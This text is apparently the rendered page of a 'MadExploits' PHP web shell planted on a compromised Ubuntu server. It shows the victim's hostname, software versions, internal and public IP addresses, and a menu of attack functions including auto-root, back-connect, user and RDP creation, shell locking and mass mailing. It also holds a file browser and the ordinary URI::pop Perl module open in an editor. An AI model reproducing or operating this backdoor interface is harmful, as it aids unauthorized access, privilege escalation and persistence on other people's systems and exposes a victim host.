Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 18.222.60.144
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
URI /
[ HOME SHELL ]
Name
Size
Permission
Action
file
[ DIR ]
drwxr-xr-x
urn
[ DIR ]
drwxr-xr-x
Escape.pm
6.9
KB
-rw-r--r--
Heuristic.pm
6.37
KB
-rw-r--r--
IRI.pm
820
B
-rw-r--r--
QueryParam.pm
4.77
KB
-rw-r--r--
Split.pm
2.32
KB
-rw-r--r--
URL.pm
5.36
KB
-rw-r--r--
WithBase.pm
3.77
KB
-rw-r--r--
_foreign.pm
133
B
-rw-r--r--
_generic.pm
5.71
KB
-rw-r--r--
_idna.pm
2.06
KB
-rw-r--r--
_ldap.pm
3.2
KB
-rw-r--r--
_login.pm
257
B
-rw-r--r--
_punycode.pm
5.52
KB
-rw-r--r--
_query.pm
2.5
KB
-rw-r--r--
_segment.pm
442
B
-rw-r--r--
_server.pm
3.66
KB
-rw-r--r--
_userpass.pm
1.04
KB
-rw-r--r--
data.pm
3.34
KB
-rw-r--r--
file.pm
9.53
KB
-rw-r--r--
ftp.pm
1.06
KB
-rw-r--r--
gopher.pm
2.4
KB
-rw-r--r--
http.pm
451
B
-rw-r--r--
https.pm
170
B
-rw-r--r--
ldap.pm
2.88
KB
-rw-r--r--
ldapi.pm
467
B
-rw-r--r--
ldaps.pm
170
B
-rw-r--r--
mailto.pm
1.27
KB
-rw-r--r--
mms.pm
151
B
-rw-r--r--
news.pm
1.45
KB
-rw-r--r--
nntp.pm
153
B
-rw-r--r--
pop.pm
1.2
KB
-rw-r--r--
rlogin.pm
155
B
-rw-r--r--
rsync.pm
233
B
-rw-r--r--
rtsp.pm
151
B
-rw-r--r--
rtspu.pm
152
B
-rw-r--r--
sftp.pm
124
B
-rw-r--r--
sip.pm
1.69
KB
-rw-r--r--
sips.pm
169
B
-rw-r--r--
snews.pm
198
B
-rw-r--r--
ssh.pm
201
B
-rw-r--r--
telnet.pm
154
B
-rw-r--r--
tn3270.pm
154
B
-rw-r--r--
urn.pm
2.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pop.pm
package URI::pop; # RFC 2384 use strict; use warnings; our $VERSION = '1.73'; $VERSION = eval $VERSION; use parent 'URI::_server'; use URI::Escape qw(uri_unescape); sub default_port { 110 } #pop://<user>;auth=<auth>@<host>:<port> sub user { my $self = shift; my $old = $self->userinfo; if (@_) { my $new_info = $old; $new_info = "" unless defined $new_info; $new_info =~ s/^[^;]*//; my $new = shift; if (!defined($new) && !length($new_info)) { $self->userinfo(undef); } else { $new = "" unless defined $new; $new =~ s/%/%25/g; $new =~ s/;/%3B/g; $self->userinfo("$new$new_info"); } } return undef unless defined $old; $old =~ s/;.*//; return uri_unescape($old); } sub auth { my $self = shift; my $old = $self->userinfo; if (@_) { my $new = $old; $new = "" unless defined $new; $new =~ s/(^[^;]*)//; my $user = $1; $new =~ s/;auth=[^;]*//i; my $auth = shift; if (defined $auth) { $auth =~ s/%/%25/g; $auth =~ s/;/%3B/g; $new = ";AUTH=$auth$new"; } $self->userinfo("$user$new"); } return undef unless defined $old; $old =~ s/^[^;]*//; return uri_unescape($1) if $old =~ /;auth=(.*)/i; return; } 1;
Close